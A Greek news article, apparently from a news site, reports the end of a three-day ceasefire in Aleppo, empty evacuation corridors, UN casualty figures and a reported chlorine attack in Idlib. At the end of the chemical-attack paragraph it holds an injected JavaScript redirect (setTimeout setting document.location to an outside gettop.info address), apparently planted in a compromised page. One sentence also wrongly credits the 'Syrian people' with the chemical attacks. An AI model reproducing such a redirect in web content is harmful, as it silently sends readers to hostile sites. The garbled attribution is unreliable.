Έληξε η ανθρωπιστική εκεχειρία στο Χαλέπι – Συνεχίζονται οι σφοδρές μάχες

0
8

 

Τερματίστηκε έπειτα από τρες ημέρες η κατάπαυση πυρος στο Χαλέπι όμως ο ΟΗΕ δεν κτάφερε να απομακρύνει αμάχους και περίπου 200 τραυματίες από τις περιοχές της πόλης πυο είναι υπό τον έλεγχο των ανταρτών.

Οι οκτώ διάδρομοι που είχε δημιουργήσει η Ρωσία για την απομάκρυνση από το Χαλέπι των κατοίκων και των ανταρτών που το επιθυμούσαν παρέμειναν έρημοι. «Κανείς δεν βγήκε από τους διαδρόμους», επιβεβαίωσε ο Ράμι Άμπντελ Ράχμαν επικεφαλής του Συριακού Παρατηρητηρίου Ανθρωπίνων Δικαιωμάτων.

Ο ΟΗΕ, που ζήτησε την παράταση της εκεχειρίας ως τη Δευτέρα, έκανε λόγο για ανεπαρκείς συνθήκες ασφαλείας.

Οι ρωσικές Αρχές και τα συριακά ΜΜΕ κατηγόρησαν τους αντάρτες ότι εμπόδισαν την έξοδο όσων το επιθυμούσαν. Μετά την τριήμερη κατάπαυση πυρός ξέσπασαν εκ νέου βίαιες συγκρούσεις, καθώς πυρά του πυροβολικού, μάχες και αεροπορικά πλήγματα σημειώθηκαν σε πολλές περιοχές της δεύτερης μεγαλύτερης πόλης στη Συρία.

Σύμφωνα με στοιχεία του ΟΗΕ, περίπου 500 άνθρωποι έχουν σκοτωθεί και 2.000 τραυματιστεί τις τελευταίες τέσσερις εβδομάδες εξαιτίας των σφοδρών βομβαρδισμών από τον συριακό και τον ρωσικό στρατό, ενώ έχουν καταστραφεί πολιτικές υποδομές, κυρίως νοσοκομεία.

Στο μεταξύ το Συμβούλιο Ασφαλείας του ΟΗΕ έλαβε απόρρητη έκθεση, σύμφωνα με την οποία ο συριακός στρατός διεξήγαγε μία ακόμη χημική επίθεση με αέριο χλωρίνης στην πόλης Κμένας της επαρχίας Ιντλίμπ η οποία ελέγχεται από τους αντάρτες στις 16 Μαρτίου 2015. Πρόκειται για την τρίτη επίθεση με χημικά όπλα που έχει εξαπολύσει ο συριακός λαός στη διάρκεια του 2014 και 2015. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here